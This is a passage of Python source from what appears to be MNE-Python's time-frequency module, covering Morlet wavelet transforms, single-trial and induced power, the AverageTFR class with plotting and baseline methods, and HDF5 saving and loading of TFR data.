# Get dpss tapers
tapers, conc = dpss_windows(t.shape[0], time_bandwidth / 2.,
n_taps)
Wk = oscillation * tapers[m]
if zero_mean: # to make it zero mean
real_offset = Wk.mean()
Wk -= real_offset
Wk /= sqrt(0.5) * linalg.norm(Wk.ravel())
Wm.append(Wk)
Ws.append(Wm)
return Ws
def _centered(arr, newsize):
"""Aux Function to center data"""
# Return the center newsize portion of the array.
newsize = np.asarray(newsize)
currsize = np.array(arr.shape)
startind = (currsize - newsize) // 2
endind = startind + newsize
myslice = [slice(startind[k], endind[k]) for k in range(len(endind))]
return arr[tuple(myslice)]
def _cwt_fft(X, Ws, mode="same"):
"""Compute cwt with fft based convolutions
Return a generator over signals.
"""
X = np.asarray(X)
# Precompute wavelets for given frequency range to save time
n_signals, n_times = X.shape
n_freqs = len(Ws)
Ws_max_size = max(W.size for W in Ws)
size = n_times + Ws_max_size - 1
# Always use 2**n-sized FFT
fsize = 2 ** int(np.ceil(np.log2(size)))
# precompute FFTs of Ws
fft_Ws = np.empty((n_freqs, fsize), dtype=np.complex128)
for i, W in enumerate(Ws):
if len(W) > n_times:
raise ValueError('Wavelet is too long for such a short signal. '
'Reduce the number of cycles.')
fft_Ws[i] = fftn(W, [fsize])
for k, x in enumerate(X):
if mode == "full":
tfr = np.zeros((n_freqs, fsize), dtype=np.complex128)
elif mode == "same" or mode == "valid":
tfr = np.zeros((n_freqs, n_times), dtype=np.complex128)
fft_x = fftn(x, [fsize])
for i, W in enumerate(Ws):
ret = ifftn(fft_x * fft_Ws[i])[:n_times + W.size - 1]
if mode == "valid":
sz = abs(W.size - n_times) + 1
                offset = (n_times - sz) // 2
tfr[i, offset:(offset + sz)] = _centered(ret, sz)
else:
tfr[i, :] = _centered(ret, n_times)
yield tfr
def _cwt_convolve(X, Ws, mode='same'):
"""Compute time freq decomposition with temporal convolutions
Return a generator over signals.
"""
X = np.asarray(X)
n_signals, n_times = X.shape
n_freqs = len(Ws)
# Compute convolutions
for x in X:
tfr = np.zeros((n_freqs, n_times), dtype=np.complex128)
for i, W in enumerate(Ws):
ret = np.convolve(x, W, mode=mode)
if len(W) > len(x):
raise ValueError('Wavelet is too long for such a short '
'signal. Reduce the number of cycles.')
if mode == "valid":
sz = abs(W.size - n_times) + 1
                offset = (n_times - sz) // 2
tfr[i, offset:(offset + sz)] = ret
else:
tfr[i] = ret
yield tfr
def cwt_morlet(X, sfreq, freqs, use_fft=True, n_cycles=7.0, zero_mean=False):
"""Compute time freq decomposition with Morlet wavelets
This function operates directly on numpy arrays. Consider using
`tfr_morlet` to process `Epochs` or `Evoked` instances.
Parameters
----------
X : array of shape [n_signals, n_times]
signals (one per line)
sfreq : float
sampling Frequency
freqs : array
Array of frequencies of interest
use_fft : bool
        Compute convolution with FFT or temporal convolution.
n_cycles: float | array of float
Number of cycles. Fixed number or one per frequency.
zero_mean : bool
Make sure the wavelets are zero mean.
Returns
-------
tfr : 3D array
Time Frequency Decompositions (n_signals x n_frequencies x n_times)
See Also
--------
tfr.cwt : Compute time-frequency decomposition with user-provided wavelets
"""
mode = 'same'
# mode = "valid"
n_signals, n_times = X.shape
n_frequencies = len(freqs)
# Precompute wavelets for given frequency range to save time
Ws = morlet(sfreq, freqs, n_cycles=n_cycles, zero_mean=zero_mean)
if use_fft:
coefs = _cwt_fft(X, Ws, mode)
else:
coefs = _cwt_convolve(X, Ws, mode)
tfrs = np.empty((n_signals, n_frequencies, n_times), dtype=np.complex)
for k, tfr in enumerate(coefs):
tfrs[k] = tfr
return tfrs
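# Illustrative sketch (added comment): applying `cwt_morlet` to random signals.
# Shapes only; the data and frequencies are made-up example values.
#
#     >>> import numpy as np
#     >>> X = np.random.randn(2, 1000)  # 2 signals, 1 s at 1 kHz
#     >>> tfr = cwt_morlet(X, sfreq=1000., freqs=np.array([20., 40.]))
#     >>> tfr.shape  # (n_signals, n_freqs, n_times)
#     (2, 2, 1000)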
def cwt(X, Ws, use_fft=True, mode='same', decim=1):
"""Compute time freq decomposition with continuous wavelet transform
Parameters
----------
X : array of shape [n_signals, n_times]
signals (one per line)
Ws : list of array
Wavelets time series
use_fft : bool
Use FFT for convolutions
mode : 'same' | 'valid' | 'full'
Convention for convolution
decim : int
Temporal decimation factor
Returns
-------
tfr : 3D array
Time Frequency Decompositions (n_signals x n_frequencies x n_times)
See Also
--------
mne.time_frequency.cwt_morlet : Compute time-frequency decomposition
with Morlet wavelets
"""
n_signals, n_times = X[:, ::decim].shape
n_frequencies = len(Ws)
if use_fft:
coefs = _cwt_fft(X, Ws, mode)
else:
coefs = _cwt_convolve(X, Ws, mode)
tfrs = np.empty((n_signals, n_frequencies, n_times), dtype=np.complex)
for k, tfr in enumerate(coefs):
tfrs[k] = tfr[..., ::decim]
return tfrs
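# Illustrative sketch (added comment): `cwt` with user-built wavelets, e.g. a
# Morlet family from `morlet` above, plus temporal decimation. Example values.
#
#     >>> import numpy as np
#     >>> X = np.random.randn(1, 1500)
#     >>> Ws = morlet(sfreq=1000., freqs=np.array([15., 30.]), n_cycles=5)
#     >>> cwt(X, Ws, use_fft=True, decim=2).shape
#     (1, 2, 750)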
def _time_frequency(X, Ws, use_fft, decim):
"""Aux of time_frequency for parallel computing over channels
"""
n_epochs, n_times = X.shape
n_times = n_times // decim + bool(n_times % decim)
n_frequencies = len(Ws)
psd = np.zeros((n_frequencies, n_times)) # PSD
plf = np.zeros((n_frequencies, n_times), np.complex) # phase lock
mode = 'same'
if use_fft:
tfrs = _cwt_fft(X, Ws, mode)
else:
tfrs = _cwt_convolve(X, Ws, mode)
for tfr in tfrs:
tfr = tfr[:, ::decim]
tfr_abs = np.abs(tfr)
psd += tfr_abs ** 2
plf += tfr / tfr_abs
psd /= n_epochs
plf = np.abs(plf) / n_epochs
return psd, plf
@verbose
def single_trial_power(data, sfreq, frequencies, use_fft=True, n_cycles=7,
baseline=None, baseline_mode='ratio', times=None,
decim=1, n_jobs=1, zero_mean=False, verbose=None):
"""Compute time-frequency power on single epochs
Parameters
----------
data : array of shape [n_epochs, n_channels, n_times]
The epochs
sfreq : float
Sampling rate
frequencies : array-like
The frequencies
use_fft : bool
Use the FFT for convolutions or not.
n_cycles : float | array of float
Number of cycles in the Morlet wavelet. Fixed number
or one per frequency.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
        If baseline is equal to (None, None) all the time
interval is used.
baseline_mode : None | 'ratio' | 'zscore'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
times : array
Required to define baseline
decim : int
Temporal decimation factor
n_jobs : int
The number of epochs to process at the same time
zero_mean : bool
Make sure the wavelets are zero mean.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : 4D array
Power estimate (Epochs x Channels x Frequencies x Timepoints).
"""
mode = 'same'
n_frequencies = len(frequencies)
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
# Precompute wavelets for given frequency range to save time
Ws = morlet(sfreq, frequencies, n_cycles=n_cycles, zero_mean=zero_mean)
parallel, my_cwt, _ = parallel_func(cwt, n_jobs)
logger.info("Computing time-frequency power on single epochs...")
power = np.empty((n_epochs, n_channels, n_frequencies, n_times),
dtype=np.float)
# Package arguments for `cwt` here to minimize omissions where only one of
# the two calls below is updated with new function arguments.
cwt_kw = dict(Ws=Ws, use_fft=use_fft, mode=mode, decim=decim)
if n_jobs == 1:
for k, e in enumerate(data):
x = cwt(e, **cwt_kw)
power[k] = (x * x.conj()).real
else:
# Precompute tf decompositions in parallel
tfrs = parallel(my_cwt(e, **cwt_kw) for e in data)
for k, tfr in enumerate(tfrs):
power[k] = (tfr * tfr.conj()).real
# Run baseline correction. Be sure to decimate the times array as well if
# needed.
if times is not None:
times = times[::decim]
power = rescale(power, times, baseline, baseline_mode, copy=False)
return power
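# Illustrative sketch (added comment): per-epoch power with a ratio baseline.
# The epochs array, frequencies and times are synthetic example values.
#
#     >>> import numpy as np
#     >>> data = np.random.randn(5, 3, 1000)      # epochs x channels x times
#     >>> times = np.arange(1000) / 1000. - 0.2   # -0.2 s to 0.8 s
#     >>> power = single_trial_power(data, sfreq=1000., frequencies=[20., 30.],
#     ...                            baseline=(None, 0), times=times)
#     >>> power.shape
#     (5, 3, 2, 1000)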
def _induced_power_cwt(data, sfreq, frequencies, use_fft=True, n_cycles=7,
decim=1, n_jobs=1, zero_mean=False):
"""Compute time induced power and inter-trial phase-locking factor
The time frequency decomposition is done with Morlet wavelets
Parameters
----------
data : array
3D array of shape [n_epochs, n_channels, n_times]
sfreq : float
sampling Frequency
frequencies : array
Array of frequencies of interest
use_fft : bool
Compute transform with fft based convolutions or temporal
convolutions.
n_cycles : float | array of float
Number of cycles. Fixed number or one per frequency.
decim: int
Temporal decimation factor
n_jobs : int
        The number of CPUs used in parallel. If -1, all CPUs are used.
Requires joblib package.
zero_mean : bool
Make sure the wavelets are zero mean.
Returns
-------
    power : 3D array
        Induced power (Channels x Frequencies x Timepoints).
        Squared amplitude of time-frequency coefficients.
    phase_lock : 3D array
        Phase locking factor in [0, 1] (Channels x Frequencies x Timepoints)
"""
n_frequencies = len(frequencies)
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
# Precompute wavelets for given frequency range to save time
Ws = morlet(sfreq, frequencies, n_cycles=n_cycles, zero_mean=zero_mean)
psd = np.empty((n_channels, n_frequencies, n_times))
plf = np.empty((n_channels, n_frequencies, n_times))
# Separate to save memory for n_jobs=1
parallel, my_time_frequency, _ = parallel_func(_time_frequency, n_jobs)
psd_plf = parallel(my_time_frequency(data[:, c, :], Ws, use_fft, decim)
for c in range(n_channels))
for c, (psd_c, plf_c) in enumerate(psd_plf):
psd[c, :, :], plf[c, :, :] = psd_c, plf_c
return psd, plf
def _preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax, mode,
baseline, vmin, vmax, dB):
"""Aux Function to prepare tfr computation"""
from ..viz.utils import _setup_vmin_vmax
if mode is not None and baseline is not None:
logger.info("Applying baseline correction '%s' during %s" %
(mode, baseline))
data = rescale(data.copy(), times, baseline, mode)
# crop time
itmin, itmax = None, None
idx = np.where(_time_mask(times, tmin, tmax))[0]
if tmin is not None:
itmin = idx[0]
if tmax is not None:
itmax = idx[-1] + 1
times = times[itmin:itmax]
# crop freqs
ifmin, ifmax = None, None
idx = np.where(_time_mask(freqs, fmin, fmax))[0]
if fmin is not None:
ifmin = idx[0]
if fmax is not None:
ifmax = idx[-1] + 1
freqs = freqs[ifmin:ifmax]
# crop data
data = data[:, ifmin:ifmax, itmin:itmax]
times *= 1e3
if dB:
data = 10 * np.log10((data * data.conj()).real)
vmin, vmax = _setup_vmin_vmax(data, vmin, vmax)
return data, times, freqs, vmin, vmax
class AverageTFR(ContainsMixin, UpdateChannelsMixin):
"""Container for Time-Frequency data
Can for example store induced power at sensor level or intertrial
coherence.
Parameters
----------
info : Info
The measurement info.
data : ndarray, shape (n_channels, n_freqs, n_times)
The data.
times : ndarray, shape (n_times,)
The time values in seconds.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
nave : int
The number of averaged TFRs.
comment : str | None
Comment on the data, e.g., the experimental condition.
Defaults to None.
method : str | None
Comment on the method used to compute the data, e.g., morlet wavelet.
Defaults to None.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
ch_names : list
The names of the channels.
"""
@verbose
def __init__(self, info, data, times, freqs, nave, comment=None,
method=None, verbose=None):
self.info = info
if data.ndim != 3:
raise ValueError('data should be 3d. Got %d.' % data.ndim)
n_channels, n_freqs, n_times = data.shape
if n_channels != len(info['chs']):
raise ValueError("Number of channels and data size don't match"
" (%d != %d)." % (n_channels, len(info['chs'])))
if n_freqs != len(freqs):
raise ValueError("Number of frequencies and data size don't match"
" (%d != %d)." % (n_freqs, len(freqs)))
if n_times != len(times):
raise ValueError("Number of times and data size don't match"
" (%d != %d)." % (n_times, len(times)))
self.data = data
self.times = times
self.freqs = freqs
self.nave = nave
self.comment = comment
self.method = method
@property
def ch_names(self):
return self.info['ch_names']
def crop(self, tmin=None, tmax=None, copy=False):
"""Crop data to a given time interval
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
copy : bool
If False epochs is cropped in place.
"""
inst = self if not copy else self.copy()
mask = _time_mask(inst.times, tmin, tmax)
inst.times = inst.times[mask]
inst.data = inst.data[..., mask]
return inst
@verbose
def plot(self, picks=None, baseline=None, mode='mean', tmin=None,
tmax=None, fmin=None, fmax=None, vmin=None, vmax=None,
cmap='RdBu_r', dB=False, colorbar=True, show=True,
title=None, axes=None, layout=None, verbose=None):
"""Plot TFRs in a topography with images
Parameters
----------
picks : array-like of int | None
The indices of the channels to plot.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
            If baseline is equal to (None, None) all the time
interval is used.
mode : None | 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline)).
If None no baseline correction is applied.
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
vmin : float | None
            The minimum value of the color scale. If vmin is None, the data
            minimum value is used.
        vmax : float | None
            The maximum value of the color scale. If vmax is None, the data
            maximum value is used.
cmap : matplotlib colormap | str
The colormap to use. Defaults to 'RdBu_r'.
dB : bool
If True, 20*log10 is applied to the data to get dB.
colorbar : bool
If true, colorbar will be added to the plot. For user defined axes,
the colorbar cannot be drawn. Defaults to True.
show : bool
Call pyplot.show() at the end.
title : str | None
String for title. Defaults to None (blank/no title).
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of channels. If instance of Axes,
there must be only one channel plotted.
layout : Layout | None
Layout instance specifying sensor positions. Used for interactive
plotting of topographies on rectangle selection. If possible, the
correct layout is inferred from the data.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz.topo import _imshow_tfr
import matplotlib.pyplot as plt
times, freqs = self.times.copy(), self.freqs.copy()
info = self.info
data = self.data
        info, data, picks = _prepare_picks(info, data, picks)
        data = data[picks]
        n_picks = len(data)
data, times, freqs, vmin, vmax = \
_preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax, mode,
baseline, vmin, vmax, dB)
tmin, tmax = times[0], times[-1]
if isinstance(axes, plt.Axes):
axes = [axes]
if isinstance(axes, list) or isinstance(axes, np.ndarray):
if len(axes) != n_picks:
raise RuntimeError('There must be an axes for each picked '
'channel.')
for idx in range(len(data)):
if axes is None:
fig = plt.figure()
ax = fig.add_subplot(111)
else:
ax = axes[idx]
fig = ax.get_figure()
onselect_callback = partial(self._onselect, baseline=baseline,
mode=mode, layout=layout)
_imshow_tfr(ax, 0, tmin, tmax, vmin, vmax, onselect_callback,
ylim=None, tfr=data[idx: idx + 1], freq=freqs,
x_label='Time (ms)', y_label='Frequency (Hz)',
colorbar=colorbar, picker=False, cmap=cmap)
if title:
fig.suptitle(title)
colorbar = False # only one colorbar for multiple axes
plt_show(show)
return fig
def _onselect(self, eclick, erelease, baseline, mode, layout):
"""Callback function called by rubber band selector in channel tfr."""
import matplotlib.pyplot as plt
from ..viz import plot_tfr_topomap
if abs(eclick.x - erelease.x) < .1 or abs(eclick.y - erelease.y) < .1:
return
plt.ion() # turn interactive mode on
tmin = round(min(eclick.xdata, erelease.xdata) / 1000., 5) # ms to s
tmax = round(max(eclick.xdata, erelease.xdata) / 1000., 5)
fmin = round(min(eclick.ydata, erelease.ydata), 5) # Hz
fmax = round(max(eclick.ydata, erelease.ydata), 5)
tmin = min(self.times, key=lambda x: abs(x - tmin)) # find closest
tmax = min(self.times, key=lambda x: abs(x - tmax))
fmin = min(self.freqs, key=lambda x: abs(x - fmin))
fmax = min(self.freqs, key=lambda x: abs(x - fmax))
if tmin == tmax or fmin == fmax:
logger.info('The selected area is too small. '
'Select a larger time-frequency window.')
return
types = list()
if 'eeg' in self:
types.append('eeg')
if 'mag' in self:
types.append('mag')
if 'grad' in self:
types.append('grad')
fig = figure_nobar()
fig.suptitle('{:.2f} s - {:.2f} s, {:.2f} Hz - {:.2f} Hz'.format(tmin,
tmax,
fmin,
fmax),
y=0.04)
for idx, ch_type in enumerate(types):
ax = plt.subplot(1, len(types), idx + 1)
plot_tfr_topomap(self, ch_type=ch_type, tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax, layout=layout,
baseline=baseline, mode=mode, cmap=None,
title=ch_type, vmin=None, vmax=None,
axes=ax)
def plot_topo(self, picks=None, baseline=None, mode='mean', tmin=None,
tmax=None, fmin=None, fmax=None, vmin=None, vmax=None,
layout=None, cmap='RdBu_r', title=None, dB=False,
colorbar=True, layout_scale=0.945, show=True,
border='none', fig_facecolor='k', font_color='w'):
"""Plot TFRs in a topography with images
Parameters
----------
picks : array-like of int | None
The indices of the channels to plot. If None all available
channels are displayed.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
            If baseline is equal to (None, None) all the time
interval is used.
mode : None | 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline)).
If None no baseline correction is applied.
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
vmin : float | None
            The minimum value of the color scale. If vmin is None, the data
            minimum value is used.
        vmax : float | None
            The maximum value of the color scale. If vmax is None, the data
maximum value is used.
layout : Layout | None
Layout instance specifying sensor positions. If possible, the
correct layout is inferred from the data.
cmap : matplotlib colormap | str
The colormap to use. Defaults to 'RdBu_r'.
title : str
Title of the figure.
dB : bool
If True, 20*log10 is applied to the data to get dB.
colorbar : bool
If true, colorbar will be added to the plot
layout_scale : float
Scaling factor for adjusting the relative size of the layout
on the canvas.
show : bool
Call pyplot.show() at the end.
border : str
matplotlib borders style to be used for each sensor plot.
fig_facecolor : str | obj
The figure face color. Defaults to black.
font_color: str | obj
The color of tick labels in the colorbar. Defaults to white.
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz.topo import _imshow_tfr, _plot_topo
times = self.times.copy()
freqs = self.freqs
data = self.data
info = self.info
info, data, picks = _prepare_picks(info, data, picks)
data = data[picks]
data, times, freqs, vmin, vmax = \
_preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax,
mode, baseline, vmin, vmax, dB)
if layout is None:
from mne import find_layout
layout = find_layout(self.info)
onselect_callback = partial(self._onselect, baseline=baseline,
mode=mode, layout=layout)
imshow = partial(_imshow_tfr, tfr=data, freq=freqs, cmap=cmap,
onselect=onselect_callback)
fig = _plot_topo(info=info, times=times, show_func=imshow,
layout=layout, colorbar=colorbar, vmin=vmin,
vmax=vmax, cmap=cmap, layout_scale=layout_scale,
title=title, border=border, x_label='Time (ms)',
y_label='Frequency (Hz)', fig_facecolor=fig_facecolor,
font_color=font_color)
plt_show(show)
return fig
def _check_compat(self, tfr):
"""checks that self and tfr have the same time-frequency ranges"""
assert np.all(tfr.times == self.times)
assert np.all(tfr.freqs == self.freqs)
def __add__(self, tfr):
self._check_compat(tfr)
out = self.copy()
out.data += tfr.data
return out
def __iadd__(self, tfr):
self._check_compat(tfr)
self.data += tfr.data
return self
def __sub__(self, tfr):
self._check_compat(tfr)
out = self.copy()
out.data -= tfr.data
return out
def __isub__(self, tfr):
self._check_compat(tfr)
self.data -= tfr.data
return self
def copy(self):
"""Return a copy of the instance."""
return deepcopy(self)
def __repr__(self):
s = "time : [%f, %f]" % (self.times[0], self.times[-1])
s += ", freq : [%f, %f]" % (self.freqs[0], self.freqs[-1])
s += ", nave : %d" % self.nave
s += ', channels : %d' % self.data.shape[0]
return "<AverageTFR | %s>" % s
def apply_baseline(self, baseline, mode='mean'):
"""Baseline correct the data
Parameters
----------
baseline : tuple or list of length 2
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
mode : 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or z-score (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
            If None, no baseline correction will be performed.
"""
self.data = rescale(self.data, self.times, baseline, mode, copy=False)
def plot_topomap(self, tmin=None, tmax=None, fmin=None, fmax=None,
ch_type=None, baseline=None, mode='mean',
layout=None, vmin=None, vmax=None, cmap=None,
sensors=True, colorbar=True, unit=None, res=64, size=2,
cbar_fmt='%1.1e', show_names=False, title=None,
axes=None, show=True, outlines='head', head_pos=None):
"""Plot topographic maps of time-frequency intervals of TFR data
Parameters
----------
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then channels are chosen in the order given above.
baseline : tuple or list of length 2
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
mode : 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or z-score (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
            If None, no baseline correction will be performed.
layout : None | Layout
Layout instance specifying sensor positions (does not need to
be specified for Neuromag data). If possible, the correct layout
file is inferred from the data; if no appropriate layout file was
found, the layout is automatically generated from the sensor
locations.
vmin : float | callable | None
The value specifying the lower bound of the color range. If None,
and vmax is None, -vmax is used. Else np.min(data) or in case
data contains only positive values 0. If callable, the output
equals vmin(data). Defaults to None.
vmax : float | callable | None
The value specifying the upper bound of the color range. If None,
the maximum value is used. If callable, the output equals
vmax(data). Defaults to None.
cmap : matplotlib colormap | None
Colormap. If None and the plotted data is all positive, defaults to
'Reds'. If None and data contains also negative values, defaults to
'RdBu_r'. Defaults to None.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True, a circle
will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
unit : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If `mask` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
axes : instance of Axes | None
The axes to plot to. If None the axes is defined automatically.
show : bool
Call pyplot.show() at the end.
outlines : 'head' | 'skirt' | dict | None
The outlines to be drawn. If 'head', the default head scheme will
be drawn. If 'skirt' the head scheme will be drawn, but sensors are
allowed to be plotted outside of the head circle. If dict, each key
refers to a tuple of x and y positions, the values in 'mask_pos'
will serve as image mask, and the 'autoshrink' (bool) field will
trigger automated shrinking of the positions due to points outside
the outline. Alternatively, a matplotlib patch object can be passed
for advanced masking options, either directly or as a function that
returns patches (required for multi-axis plots). If None, nothing
will be drawn. Defaults to 'head'.
head_pos : dict | None
If None (default), the sensors are positioned such that they span
the head circle. If dict, can have entries 'center' (tuple) and
'scale' (tuple) for what the center and scale of the head should be
relative to the electrode locations.
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz import plot_tfr_topomap
return plot_tfr_topomap(self, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, ch_type=ch_type, baseline=baseline,
mode=mode, layout=layout, vmin=vmin, vmax=vmax,
cmap=cmap, sensors=sensors, colorbar=colorbar,
unit=unit, res=res, size=size,
cbar_fmt=cbar_fmt, show_names=show_names,
title=title, axes=axes, show=show,
outlines=outlines, head_pos=head_pos)
def save(self, fname, overwrite=False):
"""Save TFR object to hdf5 file
Parameters
----------
fname : str
The file name, which should end with -tfr.h5 .
overwrite : bool
            If True, overwrite file (if it exists). Defaults to False.
"""
write_tfrs(fname, self, overwrite=overwrite)
def _prepare_write_tfr(tfr, condition):
"""Aux function"""
return (condition, dict(times=tfr.times, freqs=tfr.freqs,
data=tfr.data, info=tfr.info, nave=tfr.nave,
comment=tfr.comment, method=tfr.method))
def write_tfrs(fname, tfr, overwrite=False):
"""Write a TFR dataset to hdf5.
Parameters
----------
fname : string
The file name, which should end with -tfr.h5
tfr : AverageTFR instance, or list of AverageTFR instances
The TFR dataset, or list of TFR datasets, to save in one file.
        Note. If .comment is None, a name will be generated on the fly,
        based on the order in which the TFR objects are passed.
overwrite : bool
If True, overwrite file (if it exists). Defaults to False.
See Also
--------
read_tfrs
Notes
-----
.. versionadded:: 0.9.0
"""
out = []
if not isinstance(tfr, (list, tuple)):
tfr = [tfr]
for ii, tfr_ in enumerate(tfr):
comment = ii if tfr_.comment is None else tfr_.comment
out.append(_prepare_write_tfr(tfr_, condition=comment))
write_hdf5(fname, out, overwrite=overwrite, title='mnepython')
def read_tfrs(fname, condition=None):
"""
Read TFR datasets from hdf5 file.
Parameters
----------
fname : string
The file name, which should end with -tfr.h5 .
condition : int or str | list of int or str | None
The condition to load. If None, all conditions will be returned.
Defaults to None.
See Also
--------
write_tfrs
Returns
-------
tfrs : list of instances of AverageTFR | instance of AverageTFR
Depending on `condition` either the TFR object or a list of multiple
TFR objects.
Notes
-----
.. versionadded:: 0.9.0
"""
check_fname(fname, 'tfr', ('-tfr.h5',))
logger.info('Reading %s ...' % fname)
tfr_data = read_hdf5(fname, title='mnepython')
for k, tfr in tfr_data:
tfr['info'] = Info(tfr['info'])
if condition is not None:
tfr_dict = dict(tfr_data)
if condition not in tfr_dict:
keys = ['%s' % k for k in tfr_dict]
raise ValueError('Cannot find condition ("{0}") in this file. '
                         'I can give you "{1}"'
.format(condition, " or ".join(keys)))
out = AverageTFR(**tfr_dict[condition])
else:
out = [AverageTFR(**d) for d in list(zip(*tfr_data))[1]]
return out
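# Illustrative sketch (added comment): round-tripping AverageTFR objects through
# HDF5 with the two helpers above. `power` is assumed to be an existing
# AverageTFR instance; the file name is arbitrary.
#
#     >>> power.comment = 'faces'                              # doctest: +SKIP
#     >>> write_tfrs('faces-tfr.h5', power, overwrite=True)    # doctest: +SKIP
#     >>> tfr = read_tfrs('faces-tfr.h5', condition='faces')   # doctest: +SKIP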
@verbose
def tfr_morlet(inst, freqs, n_cycles, use_fft=False,
return_itc=True, decim=1, n_jobs=1, picks=None, verbose=None):
"""Compute Time-Frequency Representation (TFR) using Morlet wavelets
Parameters
----------
inst : Epochs | Evoked
The epochs or evoked object.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
use_fft : bool
        Whether to use FFT-based convolution.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
Must be ``False`` for evoked data.
decim : int
The decimation factor on the time axis. To reduce memory usage.
n_jobs : int
The number of jobs to run in parallel.
picks : array-like of int | None
        The indices of the channels to compute the TFR on. If None, all
        good MEG and EEG channels are used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : instance of AverageTFR
The averaged power.
itc : instance of AverageTFR
The intertrial coherence (ITC). Only returned if return_itc
is True.
See Also
--------
tfr_multitaper, tfr_stockwell
"""
data = _get_data(inst, return_itc)
info = inst.info
info, data, picks = _prepare_picks(info, data, picks)
    data = data[:, picks, :]
power, itc = _induced_power_cwt(data, sfreq=info['sfreq'],
frequencies=freqs,
n_cycles=n_cycles, n_jobs=n_jobs,
use_fft=use_fft, decim=decim,
zero_mean=True)
times = inst.times[::decim].copy()
nave = len(data)
out = AverageTFR(info, power, times, freqs, nave, method='morlet-power')
if return_itc:
out = (out, AverageTFR(info, itc, times, freqs, nave,
method='morlet-itc'))
return out
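# Illustrative sketch (added comment): typical use of `tfr_morlet` on an Epochs
# object. `epochs` is assumed to exist; frequencies and cycles are examples.
#
#     >>> import numpy as np
#     >>> freqs = np.arange(6., 30., 3.)
#     >>> power, itc = tfr_morlet(epochs, freqs=freqs, n_cycles=freqs / 2.,
#     ...                         return_itc=True, decim=3)     # doctest: +SKIP
#     >>> power.plot_topo(baseline=(None, 0), mode='logratio')  # doctest: +SKIP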
def _prepare_picks(info, data, picks):
if picks is None:
